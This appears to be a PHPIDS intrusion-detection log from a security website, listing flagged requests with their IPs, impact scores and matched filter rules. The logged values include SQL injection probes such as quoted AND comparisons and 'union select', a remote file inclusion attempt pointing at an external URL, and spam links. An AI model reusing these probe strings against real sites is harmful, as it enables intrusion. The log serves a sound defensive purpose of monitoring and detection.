IP:120.7.241.161
Impact:38
Created:2010-04-21 07:37:07
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:122079
Name:REQUEST.page
Value:security/?page=security/hackingillustrated/**/XoR/**/8=8
Page:/i.php?page=security/?page=security/hackingillustrated/**/XoR/**/8%3D8
IP:120.7.241.161
Impact:6
Created:2010-04-21 07:37:01
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:122080
Name:GET.page
Value:security/?page=security/hackingillustrated/**/XoR/**/8=8
Page:/i.php?page=security/?page=security/hackingillustrated/**/XoR/**/8%3D8
IP:120.7.241.161
Impact:6
Created:2010-04-21 07:37:01
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:122077
Name:REQUEST.page
Value:security/?page=security/hackingillustrated/**/XoR/**/8=3
Page:/i.php?page=security/?page=security/hackingillustrated/**/XoR/**/8%3D3
IP:120.7.241.161
Impact:6
Created:2010-04-21 07:37:00
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:122078
Name:GET.page
Value:security/?page=security/hackingillustrated/**/XoR/**/8=3
Page:/i.php?page=security/?page=security/hackingillustrated/**/XoR/**/8%3D3
IP:120.7.241.161
Impact:6
Created:2010-04-21 07:37:00
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:122075
Name:REQUEST.page
Value:security/?page=security/hackingillustrated%'/**/aND/**/'8%'='3
Page:/i.php?page=security/?page=security/hackingillustrated%25%27/**/aND/**/%278%25%27%3D%273
IP:120.7.241.161
Impact:66
Created:2010-04-21 07:36:50
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:122076
Name:GET.page
Value:security/?page=security/hackingillustrated%'/**/aND/**/'8%'='3
Page:/i.php?page=security/?page=security/hackingillustrated%25%27/**/aND/**/%278%25%27%3D%273
IP:120.7.241.161
Impact:66
Created:2010-04-21 07:36:50
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:122073
Name:REQUEST.page
Value:security/?page=security/hackingillustrated%'/**/aND/**/'8'='8
Page:/i.php?page=security/?page=security/hackingillustrated%25%27/**/aND/**/%278%27%3D%278
IP:120.7.241.161
Impact:66
Created:2010-04-21 07:36:49
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:122074
Name:GET.page
Value:security/?page=security/hackingillustrated%'/**/aND/**/'8'='8
Page:/i.php?page=security/?page=security/hackingillustrated%25%27/**/aND/**/%278%27%3D%278
IP:120.7.241.161
Impact:66
Created:2010-04-21 07:36:49
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:122071
Name:REQUEST.page
Value:security/?page=security/hackingillustrated%' aND '8%'='3
Page:/i.php?page=security/?page=security/hackingillustrated%25%27%09aND%09%278%25%27%3D%273
IP:120.7.241.161
Impact:46
Created:2010-04-21 07:36:48
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:122072
Name:GET.page
Value:security/?page=security/hackingillustrated%' aND '8%'='3
Page:/i.php?page=security/?page=security/hackingillustrated%25%27%09aND%09%278%25%27%3D%273
IP:120.7.241.161
Impact:46
Created:2010-04-21 07:36:48
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:122069
Name:REQUEST.page
Value:security/?page=security/hackingillustrated%' aND '8'='8
Page:/i.php?page=security/?page=security/hackingillustrated%25%27%09aND%09%278%27%3D%278
IP:120.7.241.161
Impact:46
Created:2010-04-21 07:36:47
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:122070
Name:GET.page
Value:security/?page=security/hackingillustrated%' aND '8'='8
Page:/i.php?page=security/?page=security/hackingillustrated%25%27%09aND%09%278%27%3D%278
IP:120.7.241.161
Impact:46
Created:2010-04-21 07:36:47
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:122067
Name:REQUEST.page
Value:security/?page=security/hackingillustrated%' aND '8%'='3
Page:/i.php?page=security/?page=security/hackingillustrated%25%27%20aND%20%278%25%27%3D%273
IP:120.7.241.161
Impact:46
Created:2010-04-21 07:36:46
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:122068
Name:GET.page
Value:security/?page=security/hackingillustrated%' aND '8%'='3
Page:/i.php?page=security/?page=security/hackingillustrated%25%27%20aND%20%278%25%27%3D%273
IP:120.7.241.161
Impact:46
Created:2010-04-21 07:36:46
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:122063
Name:REQUEST.page
Value:security/?page=security/hackingillustrated'/**/aND/**/'8'='3
Page:/i.php?page=security/?page=security/hackingillustrated%27/**/aND/**/%278%27%3D%273
IP:120.7.241.161
Impact:66
Created:2010-04-21 07:36:45
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:122064
Name:GET.page
Value:security/?page=security/hackingillustrated'/**/aND/**/'8'='3
Page:/i.php?page=security/?page=security/hackingillustrated%27/**/aND/**/%278%27%3D%273
IP:120.7.241.161
Impact:66
Created:2010-04-21 07:36:45
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:122065
Name:REQUEST.page
Value:security/?page=security/hackingillustrated%' aND '8%'='8
Page:/i.php?page=security/?page=security/hackingillustrated%25%27%20aND%20%278%25%27%3D%278
IP:120.7.241.161
Impact:46
Created:2010-04-21 07:36:45
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:122066
Name:GET.page
Value:security/?page=security/hackingillustrated%' aND '8%'='8
Page:/i.php?page=security/?page=security/hackingillustrated%25%27%20aND%20%278%25%27%3D%278
IP:120.7.241.161
Impact:46
Created:2010-04-21 07:36:45
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:122061
Name:REQUEST.page
Value:security/?page=security/hackingillustrated'/**/aND/**/'8'='8
Page:/i.php?page=security/?page=security/hackingillustrated%27/**/aND/**/%278%27%3D%278
IP:120.7.241.161
Impact:66
Created:2010-04-21 07:36:44
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:122062
Name:GET.page
Value:security/?page=security/hackingillustrated'/**/aND/**/'8'='8
Page:/i.php?page=security/?page=security/hackingillustrated%27/**/aND/**/%278%27%3D%278
IP:120.7.241.161
Impact:66
Created:2010-04-21 07:36:44
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:122059
Name:REQUEST.page
Value:security/?page=security/hackingillustrated/**/aND/**/8=3
Page:/i.php?page=security/?page=security/hackingillustrated/**/aND/**/8%3D3
IP:120.7.241.161
Impact:6
Created:2010-04-21 07:36:42
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:122060
Name:GET.page
Value:security/?page=security/hackingillustrated/**/aND/**/8=3
Page:/i.php?page=security/?page=security/hackingillustrated/**/aND/**/8%3D3
IP:120.7.241.161
Impact:6
Created:2010-04-21 07:36:42
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:122057
Name:REQUEST.page
Value:security/?page=security/hackingillustrated/**/aND/**/8=8
Page:/i.php?page=security/?page=security/hackingillustrated/**/aND/**/8%3D8
IP:120.7.241.161
Impact:6
Created:2010-04-21 07:36:39
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:122058
Name:GET.page
Value:security/?page=security/hackingillustrated/**/aND/**/8=8
Page:/i.php?page=security/?page=security/hackingillustrated/**/aND/**/8%3D8
IP:120.7.241.161
Impact:6
Created:2010-04-21 07:36:39
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:122055
Name:REQUEST.page
Value:security/?page=security/hackingillustrated' aND '8'='3
Page:/i.php?page=security/?page=security/hackingillustrated%27%09aND%09%278%27%3D%273
IP:120.7.241.161
Impact:46
Created:2010-04-21 07:36:34
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:122056
Name:GET.page
Value:security/?page=security/hackingillustrated' aND '8'='3
Page:/i.php?page=security/?page=security/hackingillustrated%27%09aND%09%278%27%3D%273
IP:120.7.241.161
Impact:46
Created:2010-04-21 07:36:34
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:122053
Name:REQUEST.page
Value:security/?page=security/hackingillustrated' aND '8'='8
Page:/i.php?page=security/?page=security/hackingillustrated%27%09aND%09%278%27%3D%278
IP:120.7.241.161
Impact:46
Created:2010-04-21 07:36:33
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:122054
Name:GET.page
Value:security/?page=security/hackingillustrated' aND '8'='8
Page:/i.php?page=security/?page=security/hackingillustrated%27%09aND%09%278%27%3D%278
IP:120.7.241.161
Impact:46
Created:2010-04-21 07:36:33
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:122051
Name:REQUEST.page
Value:security/?page=security/hackingillustrated' aND '8'='3
Page:/i.php?page=security/?page=security/hackingillustrated%27%20aND%20%278%27%3D%273
IP:120.7.241.161
Impact:46
Created:2010-04-21 07:36:31
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:122052
Name:GET.page
Value:security/?page=security/hackingillustrated' aND '8'='3
Page:/i.php?page=security/?page=security/hackingillustrated%27%20aND%20%278%27%3D%273
IP:120.7.241.161
Impact:46
Created:2010-04-21 07:36:31
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:122049
Name:REQUEST.page
Value:security/?page=security/hackingillustrated' aND '8'='8
Page:/i.php?page=security/?page=security/hackingillustrated%27%20aND%20%278%27%3D%278
IP:120.7.241.161
Impact:46
Created:2010-04-21 07:36:30
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:122050
Name:GET.page
Value:security/?page=security/hackingillustrated' aND '8'='8
Page:/i.php?page=security/?page=security/hackingillustrated%27%20aND%20%278%27%3D%278
IP:120.7.241.161
Impact:46
Created:2010-04-21 07:36:30
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:122047
Name:REQUEST.page
Value:security/?page=security/hackingillustrated'`([{^~
Page:/i.php?page=security/?page=security/hackingillustrated%27%60%28%5B%7B%5E%7E
IP:120.7.241.161
Impact:24
Created:2010-04-21 07:36:27
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 2.8666666666667
Converted: ((((+++::

ID:122048
Name:GET.page
Value:security/?page=security/hackingillustrated'`([{^~
Page:/i.php?page=security/?page=security/hackingillustrated%27%60%28%5B%7B%5E%7E
IP:120.7.241.161
Impact:24
Created:2010-04-21 07:36:27
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 2.8666666666667
Converted: ((((+++::

ID:122045
Name:REQUEST.codeme
Value:What?, http://jenniriverasextape.tumblr.com/ jenni rivera sex tape free, zyeeu,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:10
Created:2010-04-21 07:28:01
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7

ID:122046
Name:POST.codeme
Value:What?, http://jenniriverasextape.tumblr.com/ jenni rivera sex tape free, zyeeu,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:10
Created:2010-04-21 07:28:01
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7

ID:122043
Name:REQUEST.codeme
Value:Thank you, <a href= http://adrianalimasextape.tumblr.com/#1 >adriana lima sex tape for you</a> [url=http://adrianalimasextape.tumblr.com/#1]adriana lima sex tape for you[/url], gmk,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-21 06:48:20
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122044
Name:POST.codeme
Value:Thank you, <a href= http://adrianalimasextape.tumblr.com/#1 >adriana lima sex tape for you</a> [url=http://adrianalimasextape.tumblr.com/#1]adriana lima sex tape for you[/url], gmk,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-21 06:48:20
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122041
Name:REQUEST.BCSI-AC-4E050338BC5CF7E7
Value:1AAE78F800000005NbR0n41gqisJMk1jmtRCRA8 SAEgAAAABQAAADa8HQCAcAAAAAAAACHVAAA=
Page:/
IP:170.167.4.200
Impact:22
Created:2010-04-21 06:43:08
Details:
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.0769230769231
Converted: ((++:

ID:122042
Name:COOKIE.BCSI-AC-4E050338BC5CF7E7
Value:1AAE78F800000005NbR0n41gqisJMk1jmtRCRA8 SAEgAAAABQAAADa8HQCAcAAAAAAAACHVAAA=
Page:/
IP:170.167.4.200
Impact:22
Created:2010-04-21 06:43:08
Details:
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.0769230769231
Converted: ((++:

ID:122039
Name:REQUEST.codeme
Value:Give somebody the to a site about the, <a href= http://alysonhannigansextape.tumblr.com/#1 >All about alyson hannigan sex tape</a> [url=http://alysonhannigansextape.tumblr.com/#1]All about alyson hannigan sex tape[/url], gamfpm,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-21 06:08:30
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122040
Name:POST.codeme
Value:Give somebody the to a site about the, <a href= http://alysonhannigansextape.tumblr.com/#1 >All about alyson hannigan sex tape</a> [url=http://alysonhannigansextape.tumblr.com/#1]All about alyson hannigan sex tape[/url], gamfpm,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-21 06:08:30
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122035
Name:REQUEST.page
Value:videos/louisville-infosec-2009-videos //last_gallery.php?YAPIG_PATH=http://www.miranda.gov.ve/modules/mod_sections/tmpl/main???
Page:/i.php?page=videos/louisville-infosec-2009-videos%20%20//last_gallery.php?YAPIG_PATH=http://www.miranda.gov.ve/modules/mod_sections/tmpl/main???
IP:86.121.154.56
Impact:26
Created:2010-04-21 04:59:00
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122036
Name:REQUEST.page
Value:videos//last_gallery.php?YAPIG_PATH=http://www.miranda.gov.ve/modules/mod_sections/tmpl/main???
Page:/i.php?page=videos//last_gallery.php?YAPIG_PATH=http://www.miranda.gov.ve/modules/mod_sections/tmpl/main???
IP:86.121.154.56
Impact:20
Created:2010-04-21 04:59:00
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122037
Name:GET.page
Value:videos/louisville-infosec-2009-videos //last_gallery.php?YAPIG_PATH=http://www.miranda.gov.ve/modules/mod_sections/tmpl/main???
Page:/i.php?page=videos/louisville-infosec-2009-videos%20%20//last_gallery.php?YAPIG_PATH=http://www.miranda.gov.ve/modules/mod_sections/tmpl/main???
IP:86.121.154.56
Impact:26
Created:2010-04-21 04:59:00
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122038
Name:GET.page
Value:videos//last_gallery.php?YAPIG_PATH=http://www.miranda.gov.ve/modules/mod_sections/tmpl/main???
Page:/i.php?page=videos//last_gallery.php?YAPIG_PATH=http://www.miranda.gov.ve/modules/mod_sections/tmpl/main???
IP:86.121.154.56
Impact:20
Created:2010-04-21 04:59:00
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122033
Name:REQUEST.page
Value:security/thumbscrew-software-<span style='background-color:yellow'>usb</span>-write-blocker
Page:/i.php?page=security/thumbscrew-software-%3Cspan%20style='background-color:yellow'%3Eusb%3C/span%3E-write-blocker
IP:66.249.67.178
Impact:42
Created:2010-04-21 04:13:50
Details:
Description: finds html breaking injections including whitespace attacks | Tags: xss, csrf | ID: 1
Description: finds malicious attribute injection attempts | Tags: xss, csrf | ID: 69
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:122034
Name:GET.page
Value:security/thumbscrew-software-<span style='background-color:yellow'>usb</span>-write-blocker
Page:/i.php?page=security/thumbscrew-software-%3Cspan%20style='background-color:yellow'%3Eusb%3C/span%3E-write-blocker
IP:66.249.67.178
Impact:42
Created:2010-04-21 04:13:50
Details:
Description: finds html breaking injections including whitespace attacks | Tags: xss, csrf | ID: 1
Description: finds malicious attribute injection attempts | Tags: xss, csrf | ID: 69
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:122031
Name:REQUEST.page
Value:oldnews and 0=1 union select
Page:/i.php?page=oldnews+and+0=1+union+select+
IP:109.231.67.211
Impact:20
Created:2010-04-21 04:07:18
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122032
Name:GET.page
Value:oldnews and 0=1 union select
Page:/i.php?page=oldnews+and+0=1+union+select+
IP:109.231.67.211
Impact:20
Created:2010-04-21 04:07:18
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122029
Name:REQUEST.page
Value:security/networkprinterhacking and 0=1 union select
Page:/i.php?page=security/networkprinterhacking+and+0=1+union+select+
IP:109.231.67.211
Impact:20
Created:2010-04-21 04:07:00
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122030
Name:GET.page
Value:security/networkprinterhacking and 0=1 union select
Page:/i.php?page=security/networkprinterhacking+and+0=1+union+select+
IP:109.231.67.211
Impact:20
Created:2010-04-21 04:07:00
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122027
Name:REQUEST.page
Value:security/networkprinterhacking and 0=1 union select
Page:/i.php?page=security/networkprinterhacking+and+0=1+union+select+
IP:203.59.213.81
Impact:20
Created:2010-04-21 03:42:15
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122028
Name:GET.page
Value:security/networkprinterhacking and 0=1 union select
Page:/i.php?page=security/networkprinterhacking+and+0=1+union+select+
IP:203.59.213.81
Impact:20
Created:2010-04-21 03:42:15
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122025
Name:REQUEST.page
Value:security/networkprinterhacking and 0=1 union select
Page:/i.php?page=security/networkprinterhacking+and+0=1+union+select+
IP:213.67.242.41
Impact:20
Created:2010-04-21 02:38:27
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122026
Name:GET.page
Value:security/networkprinterhacking and 0=1 union select
Page:/i.php?page=security/networkprinterhacking+and+0=1+union+select+
IP:213.67.242.41
Impact:20
Created:2010-04-21 02:38:27
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122023
Name:REQUEST.page
Value:oldnews and 0=1 union select
Page:/i.php?page=oldnews+and+0=1+union+select+
IP:213.67.242.41
Impact:20
Created:2010-04-21 02:30:09
Details:
